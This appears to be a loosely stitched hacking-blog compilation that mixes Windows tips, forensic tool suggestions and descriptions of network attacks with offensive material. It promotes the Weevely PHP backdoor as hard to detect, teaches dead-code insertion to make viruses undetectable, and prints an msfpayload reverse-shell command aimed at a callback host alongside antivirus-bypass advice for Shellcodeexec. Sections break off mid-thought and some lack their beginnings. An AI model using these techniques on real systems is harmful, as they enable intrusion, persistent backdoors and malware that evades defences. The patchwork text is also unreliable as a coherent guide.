Pin any item to the Windows 7 taskbar

Hey you know what guys, you could pin your favorite applications or files so that you could open them quickly from any window at any time.
In Windows 7, you can pin shortcuts for favorite or frequently used files, folders, and websites to the Jump Lists for each of those programs to the taskbar
To pin a program shortcut to the taskbar, do one of the following:
•    If the program is already running, right-click the program’s button on the taskbar (or drag the button toward the desktop) to open the program’s Jump List, and then click Pin this program to taskbar.
•    Or if the program isn’t running, click Start, find the program’s icon, right-click the icon, and then click Pin to Taskbar.
•    You can also pin a program by dragging the program’s shortcut from the desktop or Start menu to the taskbar.

Concept of Hibernate mode

When you switch your laptop to hibernate mode, you are turning your computer off but saving everything you had up last while the computer was on. So when you turn it back on, the laptop will load up all the last work or whatever windows you had open before you enabled hibernate. As we all know when we restart our system, all the data that was present in RAM get vanished.
So how exactly this hibernate mode loads all the last work you had open before. In hibernate mode the current state of the system is saved in file called hiberfil.sys in your C drive and size of this file is around 1.5 Gb. Bydefault this file is invisible, if you want see this file
Goto folder options >> view >> choose show option and uncheck hide O/S protected files.
But I recommend you should always hide your O/S protected files.
So when you will choose hibernate mode your system will power down. When you will turn the system power back on, the saved information is read from the hiberfil.sys, restoring the last used settings.

winAUTOPWN and bsdAUTOPWN are minimal Interactive Frameworks which act as a frontend for quick systems vulnerability exploitation. It takes inputs like IP address, Hostname, CMS Path, etc. and does a smart multi- threaded portscan for TCP ports 1 to 65535. Exploits capable of giving Remote Shells, which are released publicly over the Internet by active contributors and exploit writers are constantly added to winAUTOPWN/bsdAUTOPWN. A lot of these exploits are written in scripting languages like python, perl and php. Presence of these language interpreters is essential for successful exploitations using winAUTOPWN/bsdAUTOPWN.

With Weevely you can create and manage PHP trojan designed to be hardly detectable.   • Tiny server: The backdoor server code is small and easily hideable in other PHP files. The core is dinamically cripted, aim to bypass pattern matching controls.
  • Modularity: Is simple to increment backdoor server feature with modules, injecting PHP code through the backdoor to implement new functionality on remote server. Code and load new modules is really easy. Current additional modules are: check safe mode, read file, download file on remote server, search writable path .
Sure looks good to be installed when you have control of a server and want to control it remotely. It is open source, so can be modified in case it is detected by anti-viruses.

How does Antivirus software works or detects virus

Hello friends, today i will explain you all how an anti-virus software works and detects virus. Most of you already know that what is anti-virus, but have you ever tried to understand how it works and why it requires updates regularly? How anti-virus searches for viruses and detects the virus in the file and eliminates it or heal it. Working of anti-virus involves two basic technologies namely:
1. Dictionary based continuous and fragmented string search
2. Suspicious activity detection (process manipulation)

How does anti-virus software works

So friends, lets start learning how an anti-virus works and detects virus and then eliminates and heals them.

Dictionary based continuous and fragmented string Search:

As the technique's name suggest, as dictionary signifies virus definitions database that is regularly updated as soon as new virus is being found (that is found by second technique). In dictionary based search technique, anti-virus software searches a string by comparing the file with strings existing in virus definition's or database.
 Now consider an hypothetical example for better understanding, suppose you have a file whose code is something like below:
ABCDEFGHIJKLMNOPQRSTUVWXYZ
Now when a virus infects a file what it does it manipulates the original file and adds some extra code or functionality to it so that the behavior of file  changes that means that defers from its normal functioning. So after virus infection file becomes something like this:
ABCDEFGHIJKLMNOPQRSTUVWXYZ012345
where 012345 is the string that virus has attached to the file after infection.
Now what does anti-virus database contains is that 012345 string . It matches the string in database with string in program or code and if it matches it identifies it as a virus.
Note: This all processing is done on binary format of codes and sometimes executable. 
Only if you manipulate the virus string that is 012345 and add some dead code between that something like below:
0a1a2a3a4a5a that means what we have done is added a between virus string but attached it in such a way that a does not affects the processing of string(virus). That means we have made new virus as this string is not there in the anti-virus database so it is not detected by anti-virus.
How can you add dead code, consider this string only 0a1a2a3a5a , read the character one by one and whenever character 'a' is found just skip the processing else concatenate the string and store that in new variable and use that variable in further processing of the code. This is how we makes any virus undetectable.
Note: But suspicious activity technique might detect this way as functionality of virus string is same.

That's the main reason why anti-virus needs updates regularly. Anti-virus companies daily adds new detected strings to their database so that the user can remain secure.

We can also bypass this using crypters too but as we are elite hackers and not script kiddies so i love to do this by manual editing rather than doing it by tools. Because if you do it using tools you will never come to know how its happening. And the day crypter becomes detectable your virus also becomes detectable. So friends i will recommend you that never depend on tools for hacking for two reasons:
1. You will never come to know the real scenario that what is happening in real time that means no knowledge. When the tool become detectable then you are noob again.
2. Most tools available are already infected with key-loggers and spy Trojans that inspect your system and send personal credentials to hackers who has created them.

Suspicious activity detection:


The most effective method to detect any malfunctioning in your system as it does not based of any search techniques rather it depends on the behavior of programs and files that how they act while they are executed or running. In this technique what happens is that anti-virus identifies the normal behavior of the file or program that what it should do when it is run without infection. Now if any file or program do any illegal processing like manipulating windows files integrity and protection then anti-virus identifies that file as virus and terminate that program and process related to it. That's the only reason why it detects patches and key-gens  as virus, as they try to manipulate the files by disassembling their integrity. 
The main drawback of this technique is that its quite annoying as sometimes it detects normal files as virus too but if you want to keep your PC safe then you need to do what your anti-virus suggests.
Also note one more thing, 99% patches and key-gens that you use to crack softwares are already infected with Trojans which are identity theft programs that steals your personal information and send them hackers. Some patches also contains back-doors that make your system open for attack similar to the way you have left your house main gate open for thieves in night....:P but its truth... 

So what is the lesson you have got from this article stop using pirated softwares and cracks to patch them otherwise you can be in great trouble. Solution for this is simple use trusted free wares as alternatives for paid tools rather than using their cracked versions...

Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.

 the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.

2. Start up List
Now you have a virtual copy of your system and now why you are waiting let's start investigating PC. So download the Start Up List (click here to download startup list).This is a great way to start the investigation of a system and determine what things might have potentially been put on the system to restart each time the system does. It will provide you the list of all programs that system use during the boot time. Great way to find the key-loggers and other remote monitoring tools as they are always added to start up.
Now why i am saying this tool as you can directly do it using MSCONFIG command. Answer is as simple as question, msconfig only displays the list of programs that are attached to start up using registry keys. Normally what happens the viruses attach themself to some of the existing windows service so it will become difficult to identify its instances. Start up list displays all the back ground programs too.


3. Open Files View
The next step in investigating your computer is to find or determine which other files, other than usual are open. In Linux we can directly do this using the ISOF command in the terminal but there is no similar command in windows. Ahhah now what will you do to investigate this.. Don't worry OpenFilesView is there(click here to download openfileview). Openfilesview is a Windows executable that lists all the files and processes that are active currently – both local and network based – on the system. So you can easily identify which unusual file is opened or which unusual process is running. Now how it helps, all key-loggers or remote administration tools always maintains a temporary file on which they write their logs or other details. Now nothing is hidden from you. You can see each and everything and find out easily that which noob virus or keylogger is running on your system.


4. Wireshark
Mine favorite tool out of 5 tools. Now you have researched your system using above there tools, it time to investigate your network traffic. Several times it happens, when you install some software you doubt that it is sending your personal data or information to someone else. Wireshark is a tool that monitors your network packets and analyze them where its sending data. Now how its helpful for you, Most Trojans and key-loggers sends logs using network and upload them to FTP or send them to some email address. Using wireshark you can monitor what they are sending and even the username and password of FTP and email accounts on which it is sending. Now you all will be thinks we have done everything, investigating is done.but i am Destructive Mind. So few more things are striking my mind. What more i can investigate in the PC. Any guesses...

Now how will you determine what the noob viruses has changed in your system, which files they have edited or attached their signatures to which of the programs and most important what they have edited or added. This you can do with the help of Helix 3. Helix 3, a newly updated version of the live Linux forensics tool, can be used to examine the disk safely to see what has been finally changed. So guys now how classy you think you have become. But sorry to inform you that its the first part of hacker's life and i guarantee 99.99% guys doesn't know these tools. Ahhh... If they know about these tools then they surely doesn't know how to use them and more important if they know that also they probably never used them as they are LAZY enough and leave everything on noob antiviruses.

How to Enable Registry disabled by Administrator

Hello friends, today i will explain you the solution of very common problem that usually users face i.e whenever you try to open registry editor you get an error message "Registry has been disabled by Your Administrator". It's a very common problem and its solution is also quite simple if you know playing with registry. My main motive is not to provide or directly feed you the solution. I want that you should explore the things. So Let's explore the registry...

What is Registry?
The Windows Registry is a hierarchical database that stores configuration settings and options on Microsoft Windows operating systems. It contains settings for low-level operating system components as well as the applications running on the platform: the kernel, device drivers, services, SAM, user interface and third party applications all make use of the registry. The registry also provides a means to access counters for profiling system performance.
I know most of you know that registry is called the "BRAIN OF WINDOWS" which store all the information in form of registry keys or technically we call them DWORD or STRING or BINARY or MULTI-STRING values which stores the data into the data in the form the name suggests. 


How to enable the Registry disabled by Administrator?
The following message usually displayed when your system is infected by some virus that changes the registry value and hence you get an error message displaying " Registry is disable by Admin". So to fix it you also have to edit the registry but since your registry has been disabled so you cannot directly access it. For this you need to create one registry file that will update the dword value into the registry database.

Steps to enable registry:
1. Open the Notepad.
2. Copy the below code and paste into the notepad.

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

3. Now save the Notepad file as "anything.reg"(without quotes) and remember to select the file type as all files while saving otherwise you will not been able to execute it.

4. Now Close the file and open by double click on file and then click ok.



How to Do it using GPEDIT.MSC
Just follow this:
Start -> Run -> gpedit.msc -> User Configuration -> Administrative Templates -> System -> Prevent access to registry editing tools -> Right Click Properties -> Disabled


That's all the simple hack to Enable the Registry disabled by Administrator. Isn't that simple...

Bypass Antivirus Protection And Execute Metasploit Payloads

Shellcodeexec: Execute Metasploit Payloads Bypassing Antivirus Protection!
Picture this – you are performing a penetration test and you find a unpatched machine. The machine is so ill-patched that you can even run the SMBv2 (CVE-2009-3103) exploit via Metasploit and your execute from memory meterpreter script fails you. The antivirus flags you and your exploit runs unsuccessfully. msfencode does not help either! What do you do then? Use Shellcodeexec, a script to execute in memory a sequence of opcodes. Its current features include:

  • Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
  • Can be compiled and works on 32-bit and 64-bit architectures.
  • As far as I know, no AV detect it as malicious.
  • Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx – Readable Writable and eXecutable.
  • It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit’s msfpayload) to Metasploit’s msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
  • Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.
How to use shellcodeexec?
The author presents perfect examples to run the tool. We have listed them as under:

Background

Most of the shellcode launchers out there, including proof of concepts part of many security books, detail how to allocate a memory page as readable/writable/executable on POSIX systems, copy over your shellcode and execute it. This works just fine. However, it is limited to POSIX, does not necessarily consider 64-bit architecture and Windows systems.

Description

This script and the relevant project files (Makefile and Visual Studio files) allow you to compile the tool once then run your shellcode across different architectures and operating systems.

Moreover, it solves a common real world issue: the target system's anti virus software blocking a Metasploit-generated payload stager (either EXE of ELF). Take for instance the following command line:
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe
This generates a Metasploit payload stager, payload.exe, that as soon as it lands on the AV-protected target system is recognized as malicious and potentially blocked (depending on the on-access scan settings) by many anti virus products. At the time of writing this text, 21 out 41 anti viruses detect it as malicious. By encoding it multiple times with msfencode, less AV softwares detect it, still a lot.

I have been surfing the Net and found some interesting tutorials and guides about packing, compressing, obfuscating and applying IDA-foo to portable executables et similar in order to narrow down the number of AV products that can detect it as a malicious file. This is all interesting, but does not stop few hard-to-die anti viruses to detect your backdoor.

So the question is, how cool would it be to have a final solution to avoid all this hassle? This is exactly where this tool comes into play!

Features

  • Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
  • Can be compiled and works on 32-bit and 64-bit architectures.
  • As far as I know, no AV detect it as malicious.
  • Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx - Readable Writable and eXecutable.
  • It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
  • Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.

TCP operates using synchronized connections. The synchronization is vulnerable to attack; this is probably the most common attack used today. The synchronization or handshake, process initiates a TCP connection. This handshake is particularly vulnerable to a DoS attack referred to as the TCP SYN Flood attack. The process is also susceptible to access and modification attacks, which are briefly explained in the following sections.

TCP SYN or TCP ACK Flood Attack - This attack is very common... The purpose of this attack is to deny service. The attack begins as a normal TCP connection: the client and the server exchange information in TCP packets. The TCP client continues to send ACK packets to the server, these ACK packets tells the server that a connection is requested. The server thus responds to the client with a ACK packet, the client is supposed to respond with another packet accepting the connection to establish the session. In this attack the client continually send and receives the ACK packets but it does not open the session. The server holds these sessions open, awaiting the final packet in the sequence. This cause the server to fill up the available connections and denies any requesting clients access.

TCP Sequence Number Attack - This is when the attacker takes control of one end of a TCP session. The goal of this attack is to kick the attacked end of the network
for the duration of the session. Only then will the attack be successful. Each time a TCP message is sent the client or the server generates a sequence number. The attacker intercepts and then responds with a sequence number similar to the one used in the original session. This attack can then hijack or disrupt a session. If a valid sequence number is guessed the attacker can place himself between the client and the server. The attacker gains the connection and the data from the legitimate system. The only defense of such an attack is to know that its occurring... There is little that can be done...

TCP Hijacking - This is also called active sniffing, it involves the attacker gaining access to a host in the network and logically disconnecting it from the network. The attacker then inserts another machine with the same IP address. This happens quickly and gives the attacker access to the session and to all the information on the original system.

UDP packets aren't connection oriented and don't require the synchronization process as with TCP. UDP packets, however, are susceptible to interception, thus it can be attacked. UDP, like TCP, doesn't check the validity of an IP address. The nature of this layer is to trust the layer above it (I'm referring to the IP layer). The most common UDP attacks involve UDP flooding. UDP flooding overloads services, networks, and servers. Large streams of UDP packets are focused at a target, causing UDP services on that host to shut down. It can also overload the network and cause a DoS situation to occur.

ICMP Attacks - This occur by triggering a response from the ICMP protocol when it responds to a seemingly legitimate request (think of it as echoing). Ping for instance, that uses the ICMP protocol. sPing is a good example of this type of attack, it overloads te server with more bytes than it can handle, larger connections. Its ping flood.

Smurf Attacks - This attack uses IP spoofing and broadcasting to send a ping to a group of hosts on a network. When a host is pinged it send back ICMP message traffic information indicating status to the originator. If a broadcast is sent to network, all hosts will answer back to the ping. The result is an overload of network and the target system. The only way to prevent this attack is to prohibit ICMP traffic on the router.

ICMP Tunneling - ICMP can contain data about timing and routes. A packet can be used to hold information that is different from the intended information. This allows an ICMP packet to be used as a communications channel between two systems. The channel can be used to send a Trojan horse or other malicious packet. The counter measure is to deny ICMP traffic on your network.
